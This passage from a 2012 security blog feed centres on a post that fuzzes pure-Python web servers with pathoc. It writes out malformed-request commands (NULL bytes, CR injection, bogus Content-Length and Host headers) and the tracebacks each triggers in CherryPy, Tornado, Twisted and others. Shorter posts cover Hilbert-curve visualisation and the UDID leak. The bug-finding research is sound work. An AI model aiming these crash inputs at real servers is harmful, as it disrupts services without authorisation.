the \"r\" mnemonic.<\/li>\n<li>I've added the \"u\" mnemonic to request specifications, as a shortcut for\nspecifying the User-Agent header:<\/li>\n<\/ul>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>get:\/:u&quot;My Weird User-Agent&quot;<\/span><\/span><\/code><\/pre>\n<p>We also have a small library of representative User-Agent strings that can be\nused instead of specifying your own. 
For example, this specifies the\nGoogleBot User-Agent string:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>get:\/:ug<\/span><\/span><\/code><\/pre>\n<p>The list of available shortcuts is in the docs, and can be listed from the\ncommand line using the <strong>--show-uas<\/strong> flag to pathoc:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>&gt; .\/pathoc --show-uas<\/span><\/span>\n<span class=\"giallo-l\"><span>User agent strings:<\/span><\/span>\n<span class=\"giallo-l\"><span>   a android<\/span><\/span>\n<span class=\"giallo-l\"><span>   l blackberry<\/span><\/span>\n<span class=\"giallo-l\"><span>   b bingbot<\/span><\/span>\n<span class=\"giallo-l\"><span>   c chrome<\/span><\/span>\n<span class=\"giallo-l\"><span>   f firefox<\/span><\/span>\n<span class=\"giallo-l\"><span>   g googlebot<\/span><\/span>\n<span class=\"giallo-l\"><span>   i ie9<\/span><\/span>\n<span class=\"giallo-l\"><span>   p ipad<\/span><\/span>\n<span class=\"giallo-l\"><span>   h iphone<\/span><\/span>\n<span class=\"giallo-l\"><span>   s safari<\/span><\/span><\/code><\/pre>"},{"title":"pathoc: break all the Python webservers!","published":"2012-09-27T00:00:00+00:00","updated":"2012-09-27T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/pathod\/pythonservers\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/pathod\/pythonservers\/","content":"<p>A few months ago, I announced <a rel=\"external\" href=\"http:\/\/pathod.net\">pathod<\/a>, a pathological HTTP\ndaemon. The project started as a testing tool to let me craft\nstandards-violating HTTP responses while working on\n<a rel=\"external\" href=\"http:\/\/mitmproxy.org\">mitmproxy<\/a>. 
It soon became a free-standing project, and\nhas turned out to be incredibly useful in security testing, exploit delivery and\ngeneral creative mischief. In the last release, I added pathoc - pathod's\nmalicious client-side twin. It does for HTTP requests what pathod does for HTTP\nresponses, and uses the same <a rel=\"external\" href=\"http:\/\/pathod.net\/docs\/language\">hyper-terse specification\nlanguage<\/a>.<\/p>\n<p>In this post, I show how pathoc can be used as a very simple fuzzer, by finding\nissues in a number of major pure-Python webservers. None of the tested servers\nfailed catastrophically - they all caught the unexpected exception and continued\nserving requests. Nonetheless, I think it's reasonable to say that we've\ntriggered a bug if a) the server returns a 500 Internal Server Error response\nor terminates the connection abnormally, and b) we see a traceback in our logs.\nIn fact, by this definition, I found bugs in <em>every<\/em> pure-Python server I\ntested.<\/p>\n<p>All of the problems I list below are simple failures of validation - what they\nhave in common is that somewhere in the project, code is called with input that\nit doesn't expect and can't handle.  This matters - in fact, I'd argue that the\nmajority of security problems fall in this category. It's interesting to ponder\nwhy this type of issue is so ubiquitous in Python servers. I have no doubt that\npart of the answer lies in Python's use of exceptions - errors that would be\nexplicit in other languages can be implicit in Python, and code that seems clean\nand intuitive might in fact be buggy. I think this is especially relevant right\nnow, given the recent flurry of discussion surrounding the <a rel=\"external\" href=\"http:\/\/golang.org\/\">Go\nlanguage<\/a> and its error handling. 
It's pretty instructive to\nread Russ Cox's <a rel=\"external\" href=\"https:\/\/plus.google.com\/116810148281701144465\/posts\/iqAiKAwP6Ce\">recent\nriposte<\/a> to\n<a rel=\"external\" href=\"http:\/\/uberpython.wordpress.com\/2012\/09\/23\/why-im-not-leaving-python-for-go\/\">this\npost<\/a>\ncriticizing Go's explicit approach, while looking at the bugs below. <a rel=\"external\" href=\"https:\/\/github.com\/cortesi\">I love\nPython<\/a> and I think it's a fine language, but I also\nthink the designers of Go probably made the right choice.<\/p>\n<h2 id=\"basic-fuzzing-with-pathoc\">Basic fuzzing with pathoc<\/h2>\n<p>My methodology for these tests was very simple indeed. I launched each server in\nturn, and used pathoc to fire corrupted GET requests at the daemon until I saw\nan error. I then looked at the logs, and boiled the distinct cases down to a\nminimal pathoc specification by hand. This exercises a rather shallow set of\nfeatures in the server software - mostly parsing of the HTTP lead-in and request\nheaders. It's possible to give software a much, much deeper workout with pathoc,\nbut I'll leave that for a future post.<\/p>\n<p>My pathoc fuzzing command looked something like this:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">pathoc<\/span><span style=\"color: #005CC5;\"> -n 1000 -p 8080 -t 1<\/span><span style=\"color: #032F62;\"> localhost &#39;get:\/:b@10:ir,&quot;\x00&quot;&#39;<\/span><\/span><\/code><\/pre>\n<p>The most important flags here are <b>-n<\/b>, which tells pathoc to make 1000\nconsecutive requests, and <b>-t<\/b>, which tells pathoc to time out after one\nsecond (necessary to prevent hangs when daemons terminate improperly). 
The\nrequest specification itself breaks down as follows:<\/p>\n<table class=\"table\">\n    <tr>\n        <td>get<\/td>\n        <td>Issue a GET request<\/td>\n    <\/tr>\n    <tr>\n        <td>\/<\/td>\n        <td>... to the path \/ <\/td>\n    <\/tr>\n    <tr>\n        <td>b@10<\/td>\n        <td>... with a body consisting of 10 random bytes <\/td>\n    <\/tr>\n    <tr>\n        <td>ir,\"\\x00\"<\/td>\n        <td>... and inject a NULL byte at a random location.<\/td>\n    <\/tr>\n<\/table>\n<p>It's that last clause - the random injection - that makes the difference between\nsimply crafting requests and basic fuzzing. Every time a new request is issued,\nthe injection occurs at a different location. I varied the injected character\nbetween a NULL byte, a carriage return and a random alphabet letter. Each\nexposed different errors in different servers. For a complete description of the\nspecification language, see the <a rel=\"external\" href=\"http:\/\/pathod.net\/docs\/language\">online docs<\/a>.<\/p>\n<h2 id=\"results\">Results<\/h2>\n<p>For each bug, I've given a traceback and a minimal pathoc call to trigger the\nissue. 
The tracebacks have been edited lightly to shorten file paths and\nremove irrelevances like timestamps.<\/p>\n<h3 id=\"cherrypy\">CherryPy<\/h3>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">pathoc<\/span><span style=\"color: #005CC5;\"> -p 8080<\/span><span style=\"color: #032F62;\"> localhost &#39;get:\/:b@10:h&quot;Content-Length&quot;=&quot;x&quot;&#39;<\/span><\/span><\/code><\/pre><pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>ENGINE ValueError(&quot;invalid literal for int() with base 10: &#39;x&#39;&quot;,)<\/span><\/span>\n<span class=\"giallo-l\"><span>Traceback (most recent call last):<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;cherrypy\/wsgiserver\/wsgiserver2.py&quot;, line 1292, in communicate<\/span><\/span>\n<span class=\"giallo-l\"><span>    req.parse_request()<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;cherrypy\/wsgiserver\/wsgiserver2.py&quot;, line 591, in parse_request<\/span><\/span>\n<span class=\"giallo-l\"><span>    success = self.read_request_headers()<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;cherrypy\/wsgiserver\/wsgiserver2.py&quot;, line 711, in read_request_headers<\/span><\/span>\n<span class=\"giallo-l\"><span>    if mrbs and int(self.inheaders.get(&quot;Content-Length&quot;, 0)) &gt; mrbs:<\/span><\/span>\n<span class=\"giallo-l\"><span>ValueError: invalid literal for int() with base 10: &#39;x&#39;<\/span><\/span><\/code><\/pre><pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">pathoc<\/span><span style=\"color: #005CC5;\"> -p 8080<\/span><span style=\"color: #032F62;\"> localhost &#39;get:\/:i4,&quot;\\r&quot;&#39;<\/span><\/span><\/code><\/pre><pre class=\"giallo\" 
style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>ENGINE TypeError(&quot;argument of type &#39;NoneType&#39; is not iterable&quot;,)<\/span><\/span>\n<span class=\"giallo-l\"><span>Traceback (most recent call last):<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;cherrypy\/wsgiserver\/wsgiserver2.py&quot;, line 1292, in communicate<\/span><\/span>\n<span class=\"giallo-l\"><span>    req.parse_request()<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;cherrypy\/wsgiserver\/wsgiserver2.py&quot;, line 580, in parse_request<\/span><\/span>\n<span class=\"giallo-l\"><span>    success = self.read_request_line()<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;cherrypy\/wsgiserver\/wsgiserver2.py&quot;, line 644, in read_request_line<\/span><\/span>\n<span class=\"giallo-l\"><span>    if NUMBER_SIGN in path:<\/span><\/span>\n<span class=\"giallo-l\"><span>TypeError: argument of type &#39;NoneType&#39; is not iterable<\/span><\/span><\/code><\/pre><h3 id=\"tornado\">Tornado<\/h3>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">pathoc<\/span><span style=\"color: #005CC5;\"> -p 8080<\/span><span style=\"color: #032F62;\"> localhost &#39;get:\/:b@10:h&quot;Content-Length&quot;=&quot;x&quot;&#39;<\/span><\/span><\/code><\/pre><pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>[E 120927 11:42:26 iostream:307] Uncaught exception, closing connection.<\/span><\/span>\n<span class=\"giallo-l\"><span>    Traceback (most recent call last):<\/span><\/span>\n<span class=\"giallo-l\"><span>      File &quot;tornado\/iostream.py&quot;, line 304, in wrapper<\/span><\/span>\n<span class=\"giallo-l\"><span>        callback(*args)<\/span><\/span>\n<span class=\"giallo-l\"><span>      File 
&quot;tornado\/httpserver.py&quot;, line 254, in _on_headers<\/span><\/span>\n<span class=\"giallo-l\"><span>        content_length = int(content_length)<\/span><\/span>\n<span class=\"giallo-l\"><span>    ValueError: invalid literal for int() with base 10: &#39;x&#39;<\/span><\/span>\n<span class=\"giallo-l\"><span>[E 120927 11:42:26 ioloop:435] Exception in callback &lt;tornado.stack_context._StackContextWrapper object at 0x1012e28e8&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    Traceback (most recent call last):<\/span><\/span>\n<span class=\"giallo-l\"><span>      File &quot;tornado\/ioloop.py&quot;, line 421, in _run_callback<\/span><\/span>\n<span class=\"giallo-l\"><span>        callback()<\/span><\/span>\n<span class=\"giallo-l\"><span>      File &quot;tornado\/iostream.py&quot;, line 304, in wrapper<\/span><\/span>\n<span class=\"giallo-l\"><span>        callback(*args)<\/span><\/span>\n<span class=\"giallo-l\"><span>      File &quot;tornado\/httpserver.py&quot;, line 254, in _on_headers<\/span><\/span>\n<span class=\"giallo-l\"><span>        content_length = int(content_length)<\/span><\/span>\n<span class=\"giallo-l\"><span>    ValueError: invalid literal for int() with base 10: &#39;x&#39;<\/span><\/span><\/code><\/pre><pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">pathoc<\/span><span style=\"color: #005CC5;\"> -p 8080<\/span><span style=\"color: #032F62;\"> localhost &#39;get:\/:h&quot;h\\r\\n&quot;=&quot;x&quot;&#39;<\/span><\/span><\/code><\/pre><pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>[E iostream:307] Uncaught exception, closing connection.<\/span><\/span>\n<span class=\"giallo-l\"><span>    Traceback (most recent call last):<\/span><\/span>\n<span class=\"giallo-l\"><span>      File &quot;tornado\/iostream.py&quot;, line 304, in 
wrapper<\/span><\/span>\n<span class=\"giallo-l\"><span>        callback(*args)<\/span><\/span>\n<span class=\"giallo-l\"><span>      File &quot;tornado\/httpserver.py&quot;, line 236, in _on_headers<\/span><\/span>\n<span class=\"giallo-l\"><span>        headers = httputil.HTTPHeaders.parse(data[eol:])<\/span><\/span>\n<span class=\"giallo-l\"><span>      File &quot;tornado\/httputil.py&quot;, line 127, in parse<\/span><\/span>\n<span class=\"giallo-l\"><span>        h.parse_line(line)<\/span><\/span>\n<span class=\"giallo-l\"><span>      File &quot;tornado\/httputil.py&quot;, line 113, in parse_line<\/span><\/span>\n<span class=\"giallo-l\"><span>        name, value = line.split(&quot;:&quot;, 1)<\/span><\/span>\n<span class=\"giallo-l\"><span>    ValueError: need more than 1 value to unpack<\/span><\/span>\n<span class=\"giallo-l\"><span>[E ioloop:435] Exception in callback &lt;tornado.stack_context._StackContextWrapper object at 0x1012bd7e0&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>    Traceback (most recent call last):<\/span><\/span>\n<span class=\"giallo-l\"><span>      File &quot;tornado\/ioloop.py&quot;, line 421, in _run_callback<\/span><\/span>\n<span class=\"giallo-l\"><span>        callback()<\/span><\/span>\n<span class=\"giallo-l\"><span>      File &quot;tornado\/iostream.py&quot;, line 304, in wrapper<\/span><\/span>\n<span class=\"giallo-l\"><span>        callback(*args)<\/span><\/span>\n<span class=\"giallo-l\"><span>      File &quot;tornado\/httpserver.py&quot;, line 236, in _on_headers<\/span><\/span>\n<span class=\"giallo-l\"><span>        headers = httputil.HTTPHeaders.parse(data[eol:])<\/span><\/span>\n<span class=\"giallo-l\"><span>      File &quot;tornado\/httputil.py&quot;, line 127, in parse<\/span><\/span>\n<span class=\"giallo-l\"><span>        h.parse_line(line)<\/span><\/span>\n<span class=\"giallo-l\"><span>      File &quot;tornado\/httputil.py&quot;, line 113, in parse_line<\/span><\/span>\n<span class=\"giallo-l\"><span>  
      name, value = line.split(&quot;:&quot;, 1)<\/span><\/span>\n<span class=\"giallo-l\"><span>    ValueError: need more than 1 value to unpack<\/span><\/span><\/code><\/pre><h3 id=\"twisted\">Twisted<\/h3>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">pathoc<\/span><span style=\"color: #005CC5;\"> -p 8080<\/span><span style=\"color: #032F62;\"> localhost &#39;get:\/:b@10:h&quot;Content-Length&quot;=&quot;x&quot;&#39;<\/span><\/span><\/code><\/pre><pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>[HTTPChannel,4,127.0.0.1] Unhandled Error<\/span><\/span>\n<span class=\"giallo-l\"><span>  Traceback (most recent call last):<\/span><\/span>\n<span class=\"giallo-l\"><span>    File &quot;twisted\/python\/log.py&quot;, line 84, in callWithLogger<\/span><\/span>\n<span class=\"giallo-l\"><span>      return callWithContext({&quot;system&quot;: lp}, func, *args, **kw)<\/span><\/span>\n<span class=\"giallo-l\"><span>    File &quot;twisted\/python\/log.py&quot;, line 69, in callWithContext<\/span><\/span>\n<span class=\"giallo-l\"><span>      return context.call({ILogContext: newCtx}, func, *args, **kw)<\/span><\/span>\n<span class=\"giallo-l\"><span>    File &quot;twisted\/python\/context.py&quot;, line 118, in callWithContext<\/span><\/span>\n<span class=\"giallo-l\"><span>      return self.currentContext().callWithContext(ctx, func, *args, **kw)<\/span><\/span>\n<span class=\"giallo-l\"><span>    File &quot;twisted\/python\/context.py&quot;, line 81, in callWithContext<\/span><\/span>\n<span class=\"giallo-l\"><span>      return func(*args,**kw)<\/span><\/span>\n<span class=\"giallo-l\"><span>  --- &lt;exception caught here&gt; ---<\/span><\/span>\n<span class=\"giallo-l\"><span>    File &quot;twisted\/internet\/selectreactor.py&quot;, line 150, in 
_doReadOrWrite<\/span><\/span>\n<span class=\"giallo-l\"><span>      why = getattr(selectable, method)()<\/span><\/span>\n<span class=\"giallo-l\"><span>    File &quot;twisted\/internet\/tcp.py&quot;, line 199, in doRead<\/span><\/span>\n<span class=\"giallo-l\"><span>      rval = self.protocol.dataReceived(data)<\/span><\/span>\n<span class=\"giallo-l\"><span>    File &quot;twisted\/protocols\/basic.py&quot;, line 564, in dataReceived<\/span><\/span>\n<span class=\"giallo-l\"><span>      why = self.lineReceived(line)<\/span><\/span>\n<span class=\"giallo-l\"><span>    File &quot;twisted\/web\/http.py&quot;, line 1558, in lineReceived<\/span><\/span>\n<span class=\"giallo-l\"><span>      self.headerReceived(self.__header)<\/span><\/span>\n<span class=\"giallo-l\"><span>    File &quot;twisted\/web\/http.py&quot;, line 1580, in headerReceived<\/span><\/span>\n<span class=\"giallo-l\"><span>      self.length = int(data)<\/span><\/span>\n<span class=\"giallo-l\"><span>  exceptions.ValueError: invalid literal for int() with base 10: &#39;x&#39;<\/span><\/span><\/code><\/pre><h3 id=\"simplehttp\">SimpleHTTP<\/h3>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">pathoc<\/span><span style=\"color: #005CC5;\"> -p 8080<\/span><span style=\"color: #032F62;\"> localhost &#39;get:&quot;\/\0&quot;&#39;<\/span><\/span><\/code><\/pre><pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>Exception happened during processing of request from (&#39;127.0.0.1&#39;, 54029)<\/span><\/span>\n<span class=\"giallo-l\"><span>Traceback (most recent call last):<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;lib\/python2.7\/SocketServer.py&quot;, line 284, in _handle_request_noblock<\/span><\/span>\n<span class=\"giallo-l\"><span>    self.process_request(request, 
client_address)<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;lib\/python2.7\/SocketServer.py&quot;, line 310, in process_request<\/span><\/span>\n<span class=\"giallo-l\"><span>    self.finish_request(request, client_address)<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;lib\/python2.7\/SocketServer.py&quot;, line 323, in finish_request<\/span><\/span>\n<span class=\"giallo-l\"><span>    self.RequestHandlerClass(request, client_address, self)<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;lib\/python2.7\/SocketServer.py&quot;, line 638, in __init__<\/span><\/span>\n<span class=\"giallo-l\"><span>    self.handle()<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;python2.7\/BaseHTTPServer.py&quot;, line 340, in handle<\/span><\/span>\n<span class=\"giallo-l\"><span>    self.handle_one_request()<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;lib\/python2.7\/BaseHTTPServer.py&quot;, line 328, in handle_one_request<\/span><\/span>\n<span class=\"giallo-l\"><span>    method()<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;lib\/python2.7\/SimpleHTTPServer.py&quot;, line 44, in do_GET<\/span><\/span>\n<span class=\"giallo-l\"><span>    f = self.send_head()<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;lib\/python2.7\/SimpleHTTPServer.py&quot;, line 68, in send_head<\/span><\/span>\n<span class=\"giallo-l\"><span>    if os.path.isdir(path):<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;lib\/python2.7\/genericpath.py&quot;, line 41, in isdir<\/span><\/span>\n<span class=\"giallo-l\"><span>    st = os.stat(s)<\/span><\/span>\n<span class=\"giallo-l\"><span>TypeError: must be encoded string without NULL bytes, not str<\/span><\/span><\/code><\/pre><h3 id=\"waitress\">Waitress<\/h3>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">pathoc<\/span><span 
style=\"color: #005CC5;\"> -p 8080<\/span><span style=\"color: #032F62;\"> localhost &#39;get:\/:i16,&quot; &quot;&#39;<\/span><\/span><\/code><\/pre><pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>ERROR:waitress:uncaptured python exception, closing channel<\/span><\/span>\n<span class=\"giallo-l\"><span>&lt;waitress.channel.HTTPChannel connected 127.0.0.1:62330 at 0x1007ca310&gt;<\/span><\/span>\n<span class=\"giallo-l\"><span>(<\/span><\/span>\n<span class=\"giallo-l\"><span>    &lt;type &#39;exceptions.IndexError&#39;&gt;:list index out of range<\/span><\/span>\n<span class=\"giallo-l\"><span>        [lib\/python2.7\/asyncore.py|read|83]<\/span><\/span>\n<span class=\"giallo-l\"><span>        [lib\/python2.7\/asyncore.py|handle_read_event|444]<\/span><\/span>\n<span class=\"giallo-l\"><span>        [lib\/python2.7\/site-packages\/waitress\/channel.py|handle_read|169]<\/span><\/span>\n<span class=\"giallo-l\"><span>        [lib\/python2.7\/site-packages\/waitress\/channel.py|received|186]<\/span><\/span>\n<span class=\"giallo-l\"><span>        [lib\/python2.7\/site-packages\/waitress\/parser.py|received|99]<\/span><\/span>\n<span class=\"giallo-l\"><span>        [lib\/python2.7\/site-packages\/waitress\/parser.py|parse_header|158]<\/span><\/span>\n<span class=\"giallo-l\"><span>        [lib\/python2.7\/site-packages\/waitress\/parser.py|get_header_lines|247]<\/span><\/span>\n<span class=\"giallo-l\"><span>)<\/span><\/span><\/code><\/pre>\n<p><strong>Edit: The first version of this post had examples that were due to the test\nWSGI application, not waitress. 
I've replaced them with the traceback above,\nwhich has been reformatted for clarity.<\/strong><\/p>\n<h3 id=\"werkzeug\">Werkzeug<\/h3>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">pathoc<\/span><span style=\"color: #005CC5;\"> -p 8080<\/span><span style=\"color: #032F62;\"> localhost &#39;get:\/:h&quot;Host&quot;=&quot;n\\r\\0&quot;&#39;<\/span><\/span><\/code><\/pre><pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"plain\"><span class=\"giallo-l\"><span>Traceback (most recent call last):<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;flask\/app.py&quot;, line 1518, in __call__<\/span><\/span>\n<span class=\"giallo-l\"><span>    return self.wsgi_app(environ, start_response)<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;flask\/app.py&quot;, line 1507, in wsgi_app<\/span><\/span>\n<span class=\"giallo-l\"><span>    return response(environ, start_response)<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;\/usr\/local\/lib\/python2.7\/site-packages\/werkzeug\/wrappers.py&quot;, line 1082, in __call__<\/span><\/span>\n<span class=\"giallo-l\"><span>    app_iter, status, headers = self.get_wsgi_response(environ)<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;werkzeug\/wrappers.py&quot;, line 1070, in get_wsgi_response<\/span><\/span>\n<span class=\"giallo-l\"><span>    headers = self.get_wsgi_headers(environ)<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;werkzeug\/wrappers.py&quot;, line 986, in get_wsgi_headers<\/span><\/span>\n<span class=\"giallo-l\"><span>    headers[&#39;Location&#39;] = location<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;werkzeug\/datastructures.py&quot;, line 1132, in __setitem__<\/span><\/span>\n<span class=\"giallo-l\"><span>    self.set(key, value)<\/span><\/span>\n<span class=\"giallo-l\"><span> 
 File &quot;werkzeug\/datastructures.py&quot;, line 1097, in set<\/span><\/span>\n<span class=\"giallo-l\"><span>    self._validate_value(_value)<\/span><\/span>\n<span class=\"giallo-l\"><span>  File &quot;werkzeug\/datastructures.py&quot;, line 1065, in _validate_value<\/span><\/span>\n<span class=\"giallo-l\"><span>    raise ValueError(&#39;Detected newline in header value.  This is &#39;<\/span><\/span>\n<span class=\"giallo-l\"><span>ValueError: Detected newline in header value.  This is a potential security problem<\/span><\/span><\/code><\/pre>"},{"title":"Limits of data visualization with space filling curves","published":"2012-09-20T00:00:00+00:00","updated":"2012-09-20T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/visualisation\/hilbert-snake\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/visualisation\/hilbert-snake\/","content":"<p>I recently wrote a <a href=\"https:\/\/corte.si\/posts\/visualisation\/binvis\/\">series<\/a> of\n<a href=\"https:\/\/corte.si\/posts\/visualisation\/entropy\/\">posts<\/a> using the <a href=\"https:\/\/corte.si\/posts\/code\/hilbert\/portrait\/\">Hilbert\ncurve<\/a> to visualize binaries,\nculminating in a <a href=\"https:\/\/corte.si\/posts\/visualisation\/malware\/\">gallery showing regions of high entropy in\nmalware<\/a>.<\/p>\n<div class=\"media\">\n    <a href=\"..&#x2F;malware&#x2F;08b983ec55bfd50d1d2cb9a90b1ae54e.html\">\n        <img src=\"malwarexample.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>The fact that the Hilbert curve has excellent locality preservation means that\none dimensional features are preserved (as much as they can be) in the\ntwo-dimensional layout. 
This lets us visually pick out features of interest, and\nmakes it possible, for instance, to quickly identify different malware packers\njust based on their layout characteristics.<\/p>\n<p>An obvious next step is to ask if it's possible to extend this idea to let us\nvisually compare binaries, creating a sort of visual diff. Unfortunately, we now\nbump our heads against the limitations of space-filling curve visualization. I\nmade the animation below after a recent conversation along these lines, and I\nthink it illustrates the main issues nicely. It shows a single contiguous\nstretch of data (the black area) being shifted progressively through a binary.\nAt each timestep, the only thing that changes is the starting location of the\ndata block:<\/p>\n<div class=\"media\">\n    <a href=\"hilbertsnake.gif\">\n        <img src=\"hilbertsnake.gif\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>Two things are immediately clear:<\/p>\n<ul>\n<li>The block of data doesn't retain its\nshape at different offsets - identical stretches of data can look totally\ndifferent depending on their locations.<\/li>\n<li>There's no way to quickly see\n<em>where<\/em> in the binary a piece of information lies. Unless you are very familiar\nwith the particular curve and know its exact orientation, you can't say, for\ninstance, when the data block lies a third of the way through the binary.<\/li>\n<\/ul>\n<p>It's often worthwhile to trade off these things for locality preservation, but\nit definitely scotches certain use cases. I do wonder if it might be possible to\ntune the trade-off somewhat - sacrificing some locality preservation for better\nshape retention and offset estimation. I've toyed with some ideas along these\nlines (see the unrolled layouts in the <a href=\"https:\/\/corte.si\/posts\/visualisation\/binvis\/\">binary visualization\npost<\/a>), but I still don't have a\nsatisfying solution. 
If anyone out there knows of one, drop me a line.<\/p>\n"},{"title":"Finding the UDID leak: a guessing game","published":"2012-09-07T00:00:00+00:00","updated":"2012-09-07T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/security\/udid-leak-guessing\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/security\/udid-leak-guessing\/","content":"<p>It's become quite a popular parlor game to guess who is responsible for the\nrecent Antisec UDID leak. I've now seen no fewer than six separate apps named as\nthe probable source (two of which came from <a rel=\"external\" href=\"http:\/\/www.marco.org\">Marco\nArment<\/a>). Before we pick the next culprit, I think it's\nworth taking a step back to consider the list of things we <em>don't<\/em> know:<\/p>\n<ul>\n<li>We don't know that we're dealing with just one source. The Antisec dump may\nwell be an amalgam of data from various sources.<\/li>\n<li>We don't know that we're looking for just one app, or even a set of apps by\none developer. The leak may well come from one of the myriad third-party services\nwhich could be included in thousands of apps.<\/li>\n<li>We don't know that Antisec is being truthful about the scale of the database,\nor the additional data they claim is associated with the UDID\/APNS records.<\/li>\n<li>We certainly don't know that the data was filched from an FBI laptop or that\nthe NCFTA was in any way involved.<\/li>\n<\/ul>\n<p>Given all of these unknowns, I think a simple process-of-elimination approach to\ntracking down the leak will probably be fruitless, or worse, result in the\nfinger being pointed at even more innocent parties. The one entity that may\nalready have the answer to this question is Apple. They have a list of a million\naffected UDIDs, and they presumably have records of all apps that have ever used\nthe associated push tokens. Given a large and precise sample like this, it\nshould be possible to find the origin(s) of the leak reasonably easily. 
Indeed,\nif Apple is on the ball they may already have done this.<\/p>\n<p>Now for some frank speculation of my own. Let's assume for a moment that Antisec\nhas been entirely truthful about the data, and that we're dealing with a single\nsource. In that case, we're looking for:<\/p>\n<ul>\n<li>... an app or third-party service integrated into multiple apps<\/li>\n<li>... with 12 million or more users<\/li>\n<li>... that is APNS-enabled<\/li>\n<li>... which also gathers user data like real names and zip codes.<\/li>\n<\/ul>\n<p>I'll throw my hat in the ring and say that my money is on a third-party service,\nnot a single app. If my hunch is right, the list of possible culprits is\nactually rather short.<\/p>\n"},{"title":"The UDID leak is a privacy catastrophe","published":"2012-09-04T00:00:00+00:00","updated":"2012-09-04T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/security\/udid-leak\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/security\/udid-leak\/","content":"<p>Something I've been worrying about for a long time has just happened: <a rel=\"external\" href=\"http:\/\/pastebin.com\/nfVT7b0Z\">Antisec\nhas leaked a database with more than a million\nUDIDs<\/a>. The UDID issue has been a bit of a white\nwhale of mine - I've written many blog posts about it and spent more hours than\nI care to think negotiating responsible disclosure with companies misusing\nUDIDs. Let's recap some of the posts I've written about this:<\/p>\n<ul>\n<li><a rel=\"external\" href=\"http:\/\/corte.si\/posts\/security\/openfeint-udid-deanonymization\/index.html\">In May 2011<\/a>,\njust before its sale to Gree was announced, I showed that\n<a rel=\"external\" href=\"http:\/\/en.wikipedia.org\/wiki\/OpenFeint\">OpenFeint<\/a> was misusing UDIDs in a way\nthat 